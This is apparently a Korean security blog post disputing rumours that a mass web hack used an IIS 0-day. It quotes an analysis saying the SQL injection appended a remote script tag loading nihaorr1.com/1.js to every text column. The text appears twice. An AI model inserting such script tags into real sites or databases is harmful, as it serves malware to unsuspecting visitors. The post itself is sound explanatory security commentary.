최근의 대량 웹 해킹이 IIS 의 0-day 취약점이 아니겠냐는 루머가 외국에 돌고 있다.
내가 보유하고 있는 패턴, 정보의 범위 내에선 이런 주장은 Non-sense 다.
참고로 국내 보안 전문가 커뮤니티에서 해당 공격에 대해 분석한 코멘트를 보자.
"쿼리가 하는 일이 ㄷㄷㄷ 이네요.
모든 사용자가 생성한 테이블을 찾아서 컬럼이 문자형(nvarchar text ntext varchar)인 경우 <script src=nihaorr1.com/1.js></script> 를 추가시킵니다.
이렇게 되면 문자형 데이터에 위 스크립트가 추가 됩니다.
예를들어 게시판의 경우 모든 리스트에 <script src=nihaorr1.com/1.js></script> 가 삽입이 되겠네요.." - by 방립동
분명 "쿼리가 하는 일이" 라고 언급하고 있으며, 해당 쿼리가 하는 일을 명확히 분석하고 있다.
마이크로소프트 사 역시 SQL injection 취약점 문제임을 분명히 언급하고 있다.
이미 공격에 사용되는 툴과 공격에 사용된 쿼리까지 분석된 마당에 IIS 0-day 루머가 계속 나오는 이유가 몰까?
이글루스 가든 - professional secur...
내가 보유하고 있는 패턴, 정보의 범위 내에선 이런 주장은 Non-sense 다.
참고로 국내 보안 전문가 커뮤니티에서 해당 공격에 대해 분석한 코멘트를 보자.
"쿼리가 하는 일이 ㄷㄷㄷ 이네요.
모든 사용자가 생성한 테이블을 찾아서 컬럼이 문자형(nvarchar text ntext varchar)인 경우 <script src=nihaorr1.com/1.js></script> 를 추가시킵니다.
이렇게 되면 문자형 데이터에 위 스크립트가 추가 됩니다.
예를들어 게시판의 경우 모든 리스트에 <script src=nihaorr1.com/1.js></script> 가 삽입이 되겠네요.." - by 방립동
분명 "쿼리가 하는 일이" 라고 언급하고 있으며, 해당 쿼리가 하는 일을 명확히 분석하고 있다.
마이크로소프트 사 역시 SQL injection 취약점 문제임을 분명히 언급하고 있다.
이미 공격에 사용되는 툴과 공격에 사용된 쿼리까지 분석된 마당에 IIS 0-day 루머가 계속 나오는 이유가 몰까?
이글루스 가든 - professional secur...
덧글